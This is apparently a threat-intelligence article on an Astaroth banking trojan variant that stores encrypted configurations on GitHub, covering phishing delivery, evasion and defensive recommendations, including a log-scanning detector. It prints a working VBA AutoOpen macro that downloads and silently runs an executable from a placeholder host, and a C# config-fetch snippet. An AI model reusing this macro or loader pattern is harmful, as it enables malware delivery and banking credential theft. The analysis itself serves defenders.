Astaroth Banking Trojan Exploits GitHub to Conceal Malicious Configurations

A new variant of the Astaroth banking trojan has surfaced, employing innovative tactics to distribute its malicious configuration files. First identified in late 2025, this campaign utilizes GitHub’s raw content service to host encrypted JSON configurations containing target URLs, browser injection parameters, and command-and-control (C2) endpoints. By leveraging GitHub’s trusted domain, Astaroth effectively evades traditional network-based detections and blends seamlessly with routine developer traffic.

Delivery Mechanism

The delivery method remains consistent with previous Astaroth outbreaks, primarily relying on spear-phishing emails. These emails often masquerade as communications from financial institutions or corporate partners, citing urgent invoice discrepancies to lure recipients. Attached to these emails are malicious Word documents embedded with obfuscated macros and decoy content designed to deceive analysts.

Upon opening the malicious document, a Visual Basic for Applications (VBA) macro is triggered, executing the following sequence:

```vba
Sub AutoOpen()
    Dim objHTTP As Object
    Dim strURL As String
    Dim strTemp As String

    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    strURL = "https://example.com/loader.exe"
    objHTTP.Open "GET", strURL, False
    objHTTP.Send

    strTemp = Environ("TEMP") & "\ldr.exe"
    If objHTTP.Status = 200 Then
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile(strTemp, True)
        objFile.Write objHTTP.responseBody
        objFile.Close
        CreateObject("WScript.Shell").Run strTemp, 0, False
    End If
End Sub
```

This macro downloads a lightweight .NET loader from a remote site. Once executed, the loader accesses GitHub’s raw content URLs to retrieve the next-stage configuration. The configuration is decrypted in memory, initiating multiple threads for web injection and credential harvesting.

Evasion Techniques

Astaroth employs several sophisticated evasion techniques to remain undetected:

– Process Hollowing and Masquerading: The malware uses process hollowing and parent-child process masquerading to avoid detection by sandbox environments.

– Minimal Disk Footprint: It minimizes the number of files dropped to disk, reducing the likelihood of detection by traditional antivirus solutions.

– Registry Manipulation: Registry entries are crafted to appear as legitimate Microsoft Office components, complicating forensic analysis.

Impact and Targets

Primarily targeting banking customers in Europe and North America, Astaroth’s impact includes:

– Unauthorized Fund Transfers: The malware facilitates illicit transfers from victims’ bank accounts.

– Credential Theft: It harvests login credentials across multiple online banking portals.

– Potential Ransomware Deployment: In certain cases, Astaroth deploys ransomware to facilitate lateral movement within networks.

Technical Details

The infection chain reveals a multi-stage process designed for stealth and reliability. After the initial macro execution and loader download, the .NET routine fetches and decrypts the GitHub-hosted configuration:

```csharp
using System.Net;
using System.Text;

// Placeholder repository path as given in the write-up, not a live indicator.
var url = "https://raw.githubusercontent.com/user/repo/main/config.dat";
using var wc = new WebClient();
byte[] data = wc.DownloadData(url);
// DecryptConfig and key are the loader's own in-memory decryption routine and
// embedded key; the write-up does not specify the algorithm.
byte[] decrypted = DecryptConfig(data, key);
var configJson = Encoding.UTF8.GetString(decrypted);
```

This approach underscores Astaroth’s reliance on legitimate infrastructure to obscure its malicious intent, complicating the ability of network defenders to distinguish between benign and malicious traffic.

Recommendations

To mitigate the threat posed by Astaroth, organizations should:

– Monitor GitHub Access: Continuously monitor unusual GitHub raw content access from non-developer endpoints.

– Enhance Email Security: Implement advanced email filtering to detect and block spear-phishing attempts.

– Educate Employees: Conduct regular training sessions to raise awareness about phishing tactics and safe email practices.

– Implement Behavioral Analysis: Deploy security solutions capable of detecting process hollowing and other evasion techniques.
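A first cut at the GitHub-access monitoring recommended above, as an added example that is not from the original article: it scores proxy log lines for raw.githubusercontent.com fetches and alerts when at least two of three indicators line up (non-developer user, user agent that is not a known developer tool, opaque payload extension such as .dat). The log format, the developer allowlist and the user-agent prefixes are constructed assumptions; adapt them to your proxy and identity data.

```python
import re

# Constructed sample proxy log lines (not from the original article); fields:
# client_ip user host path user_agent status  (user agent assumed space-free)
SAMPLE_LOG = """\
10.0.1.15 dev-alice raw.githubusercontent.com /org/tools/main/setup.sh git/2.43.0 200
10.0.2.40 fin-bob raw.githubusercontent.com /user/repo/main/config.dat Mozilla/4.0 200
10.0.1.16 dev-carol raw.githubusercontent.com /org/lib/main/README.md Code/1.85.0 200
10.0.2.41 hr-dave www.example.com /index.html Mozilla/5.0 200
10.0.2.42 fin-eve raw.githubusercontent.com /user/repo/main/config.dat Mozilla/5.0 200
"""

RAW_HOST = "raw.githubusercontent.com"
DEVELOPER_USERS = {"dev-alice", "dev-carol"}           # assumed allowlist
DEV_TOOL_UA = re.compile(r"^(git/|Code/|pip/|curl/)")   # assumed dev tooling
OPAQUE_EXT = (".dat", ".bin", ".enc")                  # non-source-code payloads
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")

def score_line(line):
    """Return (user, client_ip, url, reasons) for a raw GitHub fetch that looks
    out of place, or None for non-GitHub traffic and expected developer use."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, user, host, path, ua, _status = m.groups()
    if host != RAW_HOST:
        return None
    reasons = []
    if user not in DEVELOPER_USERS:
        reasons.append("non-developer endpoint")
    if not DEV_TOOL_UA.match(ua):
        reasons.append("user agent is not a known dev tool")
    if path.lower().endswith(OPAQUE_EXT):
        reasons.append("opaque payload extension")
    # Require two independent indicators so a developer pasting a raw URL
    # into a browser does not page the on-call analyst.
    if len(reasons) < 2:
        return None
    return (user, ip, f"https://{host}{path}", tuple(reasons))

def scan(log_text):
    """Apply score_line to every line; returns the list of alert tuples."""
    return [a for a in map(score_line, log_text.splitlines()) if a]

if __name__ == "__main__":
    for user, ip, url, reasons in scan(SAMPLE_LOG):
        print(f"{user}@{ip} -> {url}: {'; '.join(reasons)}")
```

On the constructed sample only the two finance endpoints fetching config.dat are flagged; the developers' git and editor traffic passes silently.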

By adopting these measures, organizations can strengthen their defenses against sophisticated malware campaigns like Astaroth.